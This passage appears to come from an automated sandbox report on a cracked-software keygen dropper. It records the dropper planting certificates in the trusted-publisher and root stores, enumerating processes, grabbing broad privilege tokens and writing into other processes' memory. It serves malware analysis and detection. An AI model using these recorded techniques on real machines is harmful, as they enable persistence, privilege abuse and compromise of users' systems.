0186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4332	PING.EXE
4164	PING.EXE
3944	PING.EXE

Script User-Agent 22 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	221	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	65494	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	69691	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	65521	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	179	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	224	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63375	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63411	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63126	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63422	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	65498	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	92	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	112	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	185	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	64041	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	69658	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	69666	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	119	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	141	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	181	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	229	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2052	key.exe
2052	key.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4600	6A97.tmp.exe
4600	6A97.tmp.exe
4268	file.exe
4268	file.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4524	multitimer.exe
4268	file.exe
4268	file.exe
4268	file.exe
4268	file.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
5992	app.exe
624	Process not Found
624	Process not Found

Suspicious behavior: MapViewOfSection 30 IoCs

pid	Process
5600	MicrosoftEdgeCP.exe
5600	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4064	Setup.exe
Token: SeCreateTokenPrivilege	1320	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	1320	askinstall20.exe
Token: SeLockMemoryPrivilege	1320	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	1320	askinstall20.exe
Token: SeMachineAccountPrivilege	1320	askinstall20.exe
Token: SeTcbPrivilege	1320	askinstall20.exe
Token: SeSecurityPrivilege	1320	askinstall20.exe
Token: SeTakeOwnershipPrivilege	1320	askinstall20.exe
Token: SeLoadDriverPrivilege	1320	askinstall20.exe
Token: SeSystemProfilePrivilege	1320	askinstall20.exe
Token: SeSystemtimePrivilege	1320	askinstall20.exe
Token: SeProfSingleProcessPrivilege	1320	askinstall20.exe
Token: SeIncBasePriorityPrivilege	1320	askinstall20.exe
Token: SeCreatePagefilePrivilege	1320	askinstall20.exe
Token: SeCreatePermanentPrivilege	1320	askinstall20.exe
Token: SeBackupPrivilege	1320	askinstall20.exe
Token: SeRestorePrivilege	1320	askinstall20.exe
Token: SeShutdownPrivilege	1320	askinstall20.exe
Token: SeDebugPrivilege	1320	askinstall20.exe
Token: SeAuditPrivilege	1320	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	1320	askinstall20.exe
Token: SeChangeNotifyPrivilege	1320	askinstall20.exe
Token: SeRemoteShutdownPrivilege	1320	askinstall20.exe
Token: SeUndockPrivilege	1320	askinstall20.exe
Token: SeSyncAgentPrivilege	1320	askinstall20.exe
Token: SeEnableDelegationPrivilege	1320	askinstall20.exe
Token: SeManageVolumePrivilege	1320	askinstall20.exe
Token: SeImpersonatePrivilege	1320	askinstall20.exe
Token: SeCreateGlobalPrivilege	1320	askinstall20.exe
Token: 31	1320	askinstall20.exe
Token: 32	1320	askinstall20.exe
Token: 33	1320	askinstall20.exe
Token: 34	1320	askinstall20.exe
Token: 35	1320	askinstall20.exe
Token: SeDebugPrivilege	4116	taskkill.exe
Token: SeDebugPrivilege	3548	multitimer.exe
Token: SeImpersonatePrivilege	2052	key.exe
Token: SeTcbPrivilege	2052	key.exe
Token: SeChangeNotifyPrivilege	2052	key.exe
Token: SeCreateTokenPrivilege	2052	key.exe
Token: SeBackupPrivilege	2052	key.exe
Token: SeRestorePrivilege	2052	key.exe
Token: SeIncreaseQuotaPrivilege	2052	key.exe
Token: SeAssignPrimaryTokenPrivilege	2052	key.exe
Token: SeImpersonatePrivilege	2052	key.exe
Token: SeTcbPrivilege	2052	key.exe
Token: SeChangeNotifyPrivilege	2052	key.exe
Token: SeCreateTokenPrivilege	2052	key.exe
Token: SeBackupPrivilege	2052	key.exe
Token: SeRestorePrivilege	2052	key.exe
Token: SeIncreaseQuotaPrivilege	2052	key.exe
Token: SeAssignPrimaryTokenPrivilege	2052	key.exe
Token: SeImpersonatePrivilege	2052	key.exe
Token: SeTcbPrivilege	2052	key.exe
Token: SeChangeNotifyPrivilege	2052	key.exe
Token: SeCreateTokenPrivilege	2052	key.exe
Token: SeBackupPrivilege	2052	key.exe
Token: SeRestorePrivilege	2052	key.exe
Token: SeIncreaseQuotaPrivilege	2052	key.exe
Token: SeAssignPrimaryTokenPrivilege	2052	key.exe
Token: SeImpersonatePrivilege	2052	key.exe
Token: SeTcbPrivilege	2052	key.exe
Token: SeChangeNotifyPrivilege	2052	key.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4864	p40qzszkupa.tmp
4144	Setup3310.tmp
4120	vict.tmp
4456	IBInstaller_97039.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
4800	p40qzszkupa.exe
4864	p40qzszkupa.tmp
4948	vict.exe
4992	Setup3310.exe
4124	vpn.exe
812	askinstall24.exe
4144	Setup3310.tmp
4120	vict.tmp
4092	IBInstaller_97039.exe
4280	vpn.tmp
1040	winlthst.exe
4456	IBInstaller_97039.tmp
4476	wimapi.exe
4436	app.exe
4384	chrome_proxy.exe
2196	rubntndbxig.exe
4536	rubntndbxig.tmp
5084	Setup.exe
2568	Setup.tmp
1560	MicrosoftEdge.exe
5144	tapinstall.exe
5600	MicrosoftEdgeCP.exe
5856	3tz26HrLg.exe
5128	QbfCCamg6.exe
5600	MicrosoftEdgeCP.exe
2528	7za.exe
5548	tapinstall.exe
3972	7za.exe
4788	Delta.exe
5576	Delta.tmp
4492	Setup.exe
5960	mask_svc.exe
5676	mask_svc.exe
5036	PictureLAb.exe
5628	PictureLAb.tmp
5936	Setup.exe
4408	Setup.tmp
4908	prolab.exe
5720	prolab.tmp
5640	MicrosoftEdge.exe
4512	MicrosoftEdgeCP.exe
4512	MicrosoftEdgeCP.exe
5500	hjjgaa.exe
6120	jfiag3g_gg.exe
5916	jfiag3g_gg.exe
5892	MaskVPNUpdate.exe
8136	jfiag3g_gg.exe
7304	vict.exe
6852	vict.tmp
6548	Setup3310.exe
3276	askinstall24.exe
152	Setup3310.tmp
6316	wimapi.exe
648	Setup.exe
6864	Setup.tmp
7276	Delta.exe
6692	Delta.tmp
3900	Setup.exe
7132	PictureLAb.exe
1820	PictureLAb.tmp
5708	Setup.exe
4728	Setup.tmp
6772	hjjgaa.exe
300	jfiag3g_gg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3884 wrote to memory of 196	3884	Easefab_Video_Converter_5_2_key_code_generator_by_ViKiNG.exe	78
PID 3884 wrote to memory of 196	3884	Easefab_Video_Converter_5_2_key_code_generator_by_ViKiNG.exe	78
PID 3884 wrote to memory of 196	3884	Easefab_Video_Converter_5_2_key_code_generator_by_ViKiNG.exe	78
PID 196 wrote to memory of 4040	196	cmd.exe	81
PID 196 wrote to memory of 4040	196	cmd.exe	81
PID 196 wrote to memory of 4040	196	cmd.exe	81
PID 196 wrote to memory of 64	196	cmd.exe	82
PID 196 wrote to memory of 64	196	cmd.exe	82
PID 196 wrote to memory of 64	196	cmd.exe	82
PID 196 wrote to memory of 8	196	cmd.exe	83
PID 196 wrote to memory of 8	196	cmd.exe	83
PID 196 wrote to memory of 8	196	cmd.exe	83
PID 196 wrote to memory of 3360	196	cmd.exe	84
PID 196 wrote to memory of 3360	196	cmd.exe	84
PID 196 wrote to memory of 3360	196	cmd.exe	84
PID 4040 wrote to memory of 2052	4040	keygen-pr.exe	85
PID 4040 wrote to memory of 2052	4040	keygen-pr.exe	85
PID 4040 wrote to memory of 2052	4040	keygen-pr.exe	85
PID 3360 wrote to memory of 4064	3360	keygen-step-4.exe	86
PID 3360 wrote to memory of 4064	3360	keygen-step-4.exe	86
PID 8 wrote to memory of 3504	8	keygen-step-3.exe	87
PID 8 wrote to memory of 3504	8	keygen-step-3.exe	87
PID 8 wrote to memory of 3504	8	keygen-step-3.exe	87
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 2052 wrote to memory of 1312	2052	key.exe	89
PID 3504 wrote to memory of 3944	3504	cmd.exe	90
PID 3504 wrote to memory of 3944	3504	cmd.exe	90
PID 3504 wrote to memory of 3944	3504	cmd.exe	90
PID 4064 wrote to memory of 3548	4064	Setup.exe	92
PID 4064 wrote to memory of 3548	4064	Setup.exe	92
PID 3360 wrote to memory of 1320	3360	keygen-step-4.exe	93
